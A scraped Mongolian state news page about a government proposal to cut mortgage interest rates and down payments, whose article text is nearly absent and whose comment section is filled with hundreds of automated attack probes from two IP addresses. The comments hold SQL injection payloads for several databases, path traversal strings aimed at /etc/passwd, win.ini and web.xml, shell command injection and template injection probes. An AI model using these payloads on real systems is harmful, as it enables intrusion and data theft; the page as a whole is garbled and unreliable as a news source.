Ипотекийн зээлийн хүү, урьдчилгаа төлбөрийг бууруулах асуудлыг Засгийн газрын маргаашийн хуралдаанд оруулна

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-13 13:23:14
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',5)='f 185.234.72.114 105 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d 185.234.72.114 105 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:5 185.234.72.114 105 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 105 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(5))::text>'0 185.234.72.114 105 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 105 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin"and(select*from(select+sleep(5))a/**/union/**/select+1)=" 185.234.72.114 105 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 105 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin'and(select*from(select+sleep(5))a/**/union/**/select+1)=' 185.234.72.114 105 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 105 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin"and"m"="v 185.234.72.114 105 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 105 өдөр

  123456
 • admin"and"f"="f 185.234.72.114 105 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 105 өдөр

  123456
 • admin'and'x'='w 185.234.72.114 105 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin'and'h'='h 185.234.72.114 105 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',5)='w
 • ../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f
 • admin 185.234.72.114 105 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('k',5)
 • admin 185.234.72.114 105 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('v',0)
 • admin 185.234.72.114 105 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:5
 • admin 185.234.72.114 105 өдөр

  123456'"\(
 • admin 185.234.72.114 105 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 105 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:5'/**/
 • admin 185.234.72.114 105 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1404072511')))>'0
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 105 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1974804460')))
 • admin 185.234.72.114 105 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(5))::text>'0
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 105 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 105 өдөр

  123456/**/and/**/cast(md5('1871421004')as/**/int)>0
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and(select'1'from/**/cast(md5(1247717785)as/**/int))>'0
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(5))>0/**/
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  extractvalue(1,concat(char(126),md5(1936206508)))
 • admin 185.234.72.114 105 өдөр

  123456"and(select*from(select+sleep(5))a/**/union/**/select+1)="
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1404352728)))and"
 • admin 185.234.72.114 105 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1524079831)))and'
 • admin 185.234.72.114 105 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and(select*from(select+sleep(5))a/**/union/**/select+1)='
 • admin 185.234.72.114 105 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 105 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • admin 185.234.72.114 105 өдөр

  (select*from(select+sleep(5)union/**/select+1)a)
 • admin 185.234.72.114 105 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 105 өдөр

  123456"and"y"="c
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456"and"r"="r
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and'm'='m
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and'y'='y
 • %u2215etc%u2215passwd 185.234.72.114 105 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and+2=5
 • /etc/passwdadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  expr 974296365 + 809615580
 • admin 185.234.72.114 105 өдөр

  123456/**/and+3=3
 • admin 185.234.72.114 105 өдөр

  123456&set /A 915746338+931466049
 • admin'"\( 185.234.72.114 105 өдөр

  123456
 • /etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456$(expr 910963626 + 837451426)
 • admin鎈'"\( 185.234.72.114 105 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1676113918')))>'0 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456|expr 976083204 + 934000113
 • <%- 969168146+876726037 %> 185.234.72.114 105 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456 expr 920207037 + 814421573
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 105 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • #set($c=823438663+909413957)${c}$c 185.234.72.114 105 өдөр

  123456
 • ${(872390146+818361024)?c} 185.234.72.114 105 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 105 өдөр

  123456
 • ${916775502+965563676} 185.234.72.114 105 өдөр

  123456
 • /*1*/{{932647190+906429142}} 185.234.72.114 105 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1847699136'))) 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  <%- 965719741+911311535 %>
 • admin/**/and/**/cast(md5('1693527888')as/**/int)>0 185.234.72.114 105 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1178742702)as/**/int))>'0 185.234.72.114 105 өдөр

  123456
 • expr 946613618 + 928049535 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  #set($c=802040997+895395716)${c}$c
 • extractvalue(1,concat(char(126),md5(1897363582))) 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin&set /A 914263425+872776751 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin$(expr 982158947 + 811811275) 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  ${(810855274+882225071)?c}
 • '-var_dump(md5(247794133))-' 185.234.72.114 105 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1367214519)))and" 185.234.72.114 105 өдөр

  123456
 • ${@var_dump(md5(837589324))}; 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  ${932516965+868500541}
 • admin 185.234.72.114 105 өдөр

  ${974233145+821514419}
 • admin'and/**/extractvalue(1,concat(char(126),md5(1725902075)))and' 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  /*1*/{{836690995+842533508}}
 • admin 185.234.72.114 105 өдөр

  123456
 • admin|expr 961529107 + 997111112 185.234.72.114 105 өдөр

  123456
 • nirsnqbhfxremiuvsqba 185.234.72.114 105 өдөр

  123456
 • admin expr 826785390 + 837700755 185.234.72.114 105 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  '-var_dump(md5(675792246))-'
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  ${@var_dump(md5(177739896))};
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  nirsnqbhfxremiuvsqba
 • ${980148445+847555819} 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',12)='h 194.163.191.42 106 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l 194.163.191.42 106 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 194.163.191.42 106 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 106 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 106 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 106 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 194.163.191.42 106 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 106 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 106 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 194.163.191.42 106 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 106 өдөр

  123456
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 194.163.191.42 106 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 106 өдөр

  123456
 • admin"and"i"="l 194.163.191.42 106 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 106 өдөр

  123456
 • admin"and"k"="k 194.163.191.42 106 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • admin'and'h'='s 194.163.191.42 106 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 106 өдөр

  123456
 • admin'and'q'='q 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',12)='h
 • admin 194.163.191.42 106 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',0)='i
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('s',12)
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('z',0)
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin'"\( 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin鎈'"\( 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1434807257')))>'0 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1626063330'))) 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin/**/and/**/cast(md5('1798903849')as/**/int)>0 194.163.191.42 106 өдөр

  123456
 • <%- 967967182+944033809 %> 194.163.191.42 106 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1133155351)as/**/int))>'0 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 106 өдөр

  123456
 • #set($c=869990850+811000994)${c}$c 194.163.191.42 106 өдөр

  123456
 • expr 820665029 + 855684296 194.163.191.42 106 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1504133914))) 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ${(800119816+840826229)?c} 194.163.191.42 106 өдөр

  123456
 • admin&set /A 814337784+990558416 194.163.191.42 106 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • admin"and/**/extractvalue(1,concat(char(126),md5(1264570101)))and" 194.163.191.42 106 өдөр

  123456
 • ${806763550+931126001} 194.163.191.42 106 өдөр

  123456
 • admin$(expr 843508984 + 983979591) 194.163.191.42 106 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • /*1*/{{839296580+998383607}} 194.163.191.42 106 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1029099523)))and' 194.163.191.42 106 өдөр

  123456
 • admin|expr 902505369 + 800758755 194.163.191.42 106 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • admin 194.163.191.42 106 өдөр

  123456'"\(
 • admin expr 821644204 + 875138864 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  <%- 831162191+993884557 %>
 • /etc/passwdadmin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 106 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 106 өдөр

  expr 873097276 + 976774190
 • /etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1073272951')))>'0
 • admin 194.163.191.42 106 өдөр

  #set($c=848334346+911267077)${c}$c
 • admin 194.163.191.42 106 өдөр

  123456&set /A 949991787+975381455
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1932287545')))
 • admin 194.163.191.42 106 өдөр

  123456$(expr 944246293 + 965483213)
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  ${(930774547+953434755)?c}
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and/**/cast(md5('1177044831')as/**/int)>0
 • admin 194.163.191.42 106 өдөр

  123456|expr 922766000 + 833759353
 • ./../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and"s"="g
 • admin 194.163.191.42 106 өдөр

  123456'and(select'1'from/**/cast(md5(1869491686)as/**/int))>'0
 • admin 194.163.191.42 106 өдөр

  123456 expr 834755081 + 905951265
 • admin 194.163.191.42 106 өдөр

  ${918760564+925512257}
 • ../../../../../../etc/passwdadmin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and"c"="c
 • ../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and't'='y
 • admin 194.163.191.42 106 өдөр

  /*1*/{{940396206+933097063}}
 • admin 194.163.191.42 106 өдөр

  extractvalue(1,concat(char(126),md5(1717471138)))
 • admin 194.163.191.42 106 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1984077135)))and"
 • admin 194.163.191.42 106 өдөр

  123456'and'h'='h
 • admin 194.163.191.42 106 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1596032529)))and'
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and+2=5
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and+4=4
 • '-var_dump(md5(329265076))-' 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • ytbelzqtrybtsmtjwrdv 194.163.191.42 106 өдөр

  123456
 • ${@var_dump(md5(639213601))}; 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  '-var_dump(md5(279185393))-'
 • admin 194.163.191.42 106 өдөр

  ${@var_dump(md5(422867259))};
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • ${837091632+831165959} 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  ytbelzqtrybtsmtjwrdv
 • admin 194.163.191.42 106 өдөр

  ${928130238+945845093}
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456